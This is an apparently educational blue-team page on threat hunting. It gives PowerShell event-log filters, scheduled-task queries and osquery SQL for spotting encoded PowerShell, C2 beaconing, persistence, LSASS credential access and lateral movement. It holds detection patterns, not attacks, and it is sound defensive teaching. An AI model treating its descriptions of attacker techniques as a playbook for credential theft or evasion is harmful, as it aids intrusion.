⚠️ Pracivo Security Lab — Blue team skills: log analysis, incident response, SIEM, firewall rules, IDS, threat hunting.
Threat Hunting
# Threat hunting = proactively searching for threats that evaded detection
# HYPOTHESIS-DRIVEN HUNTING
# Start with a hypothesis: "An attacker has compromised a Windows machine
# and is using LOLBins (living off the land) to avoid detection"
# Hunt 1: Suspicious PowerShell executions
# Look for: powershell.exe with encoded commands, unusual parent processes
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
Where-Object {$_.Message -like "*powershell*" -and $_.Message -like "*-enc*"}
# Hunt 2: Unusual outbound connections (C2 beaconing)
# Regular beacons have consistent intervals — look for periodic connections
# Tools: Zeek (Bro), NetworkMiner
# Look for: connections every 60s to same external IP
# Hunt 3: New scheduled tasks (persistence)
Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddDays(-7)}
schtasks /query /fo LIST /v | findstr "Task Name\|Run As User\|Schedule Type"
# Hunt 4: Credential access indicators
# Look for access to LSASS process:
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4656} |
Where-Object {$_.Message -like "*lsass*"}
# Hunt 5: Lateral movement via WMI or PsExec
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} |
Where-Object {$_.Message -like "*Network*" -and $_.Message -like "*10.0.*"}
# OSQUERY — cross-platform endpoint visibility
# Find all listening processes:
SELECT pid, name, address, port FROM listening_ports;
# Find recently modified files:
SELECT path, mtime FROM file WHERE path LIKE '/etc/%' AND mtime > (SELECT unix_time()-86400 FROM time);
# Find processes with network connections:
SELECT p.name, p.pid, n.remote_address, n.remote_port FROM processes p JOIN process_open_sockets n USING (pid);
# MITRE ATT&CK framework — maps TTPs to detections
# https://attack.mitre.org
# Use ATT&CK Navigator to plan hunts